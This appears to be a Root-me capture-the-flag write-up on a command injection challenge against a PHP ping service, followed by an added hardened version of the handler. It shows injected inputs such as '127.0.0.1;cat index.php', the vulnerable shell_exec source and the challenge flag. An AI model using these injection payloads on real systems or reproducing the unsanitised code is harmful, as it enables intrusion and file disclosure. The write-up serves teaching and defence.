Root-me

Command Injection

Ping service v1

The challenge asks us to find a vulnerability in the service. The flag is located in the index.php file.

If we look at the challenge, we’re greeted by an input box that contains a local IP. If we input 127.0.0.1 and submit it, we get this:

PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.038 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.047 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.033 ms

--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2000ms
rtt min/avg/max/mdev = 0.033/0.039/0.047/0.007 ms

So basically the service pings something.

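We’ll just get the service to do an ls in its current location. If our input is passed to a shell, a ; after the IP ends the ping command and starts a new one.

We’ll submit the input 127.0.0.1;ls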

PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.028 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.033 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.026 ms

--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 1998ms
rtt min/avg/max/mdev = 0.026/0.029/0.033/0.003 ms
index.php

Now that we have the location of index.php, we’ll do a cat on it: 127.0.0.1;cat index.php

If we then look at the source code of the response, we’ll see the flag.

<?php 
$flag = "S3rv1ceP1n9Sup3rS3cure";
$ip = $_POST["ip"];
if(isset($_POST["ip"]) && !empty($_POST["ip"])){
        $response = shell_exec("ping -c 3 ".$ip);
        echo $response;
}
?>
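
A hardened version of the handler above, as an added example that is not part of the challenge or the original write-up. The function names are hypothetical, and it assumes PHP 7.4 or later (array form of proc_open) and that only IPv4 targets need to be pinged.

```php
<?php
// Hardened take on the challenge's ping handler (added example, hypothetical names).

// Return the input only if it is a literal IPv4 address, otherwise null.
// ";", spaces and "cat index.php" can never be part of a valid address.
function validate_ping_target($input): ?string
{
    if (!is_string($input)) {
        return null;                       // e.g. ip[]=... arrives as an array
    }
    $ip = filter_var($input, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4);
    return $ip === false ? null : $ip;
}

// Run ping without a shell: with an array command (PHP >= 7.4) proc_open
// executes the program directly, so shell metacharacters are never interpreted.
function run_ping(string $ip): string
{
    $proc = proc_open(['ping', '-c', '3', $ip], [1 => ['pipe', 'w']], $pipes);
    if (!is_resource($proc)) {
        return 'ping could not be started';
    }
    $out = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    proc_close($proc);
    return $out === false ? '' : $out;
}

if (PHP_SAPI === 'cli') {
    // Constructed inputs: the benign value and the two payloads from the write-up.
    foreach (['127.0.0.1', '127.0.0.1;ls', '127.0.0.1;cat index.php'] as $sample) {
        $verdict = validate_ping_target($sample) === null ? 'rejected' : 'accepted';
        printf("%-26s %s\n", $sample, $verdict);
    }
} else {
    $ip = validate_ping_target($_POST['ip'] ?? null);
    if ($ip === null) {
        http_response_code(400);
        echo 'Invalid IP address';
    } else {
        // Encode the output too, so ping's text cannot be read as HTML.
        echo htmlspecialchars(run_ping($ip), ENT_QUOTES, 'UTF-8');
    }
}
```

Run from the command line, it only classifies the three sample inputs; behind a web server it handles the POST request. Validation and shell-free execution are independent layers, and either one alone stops the ;ls input shown above.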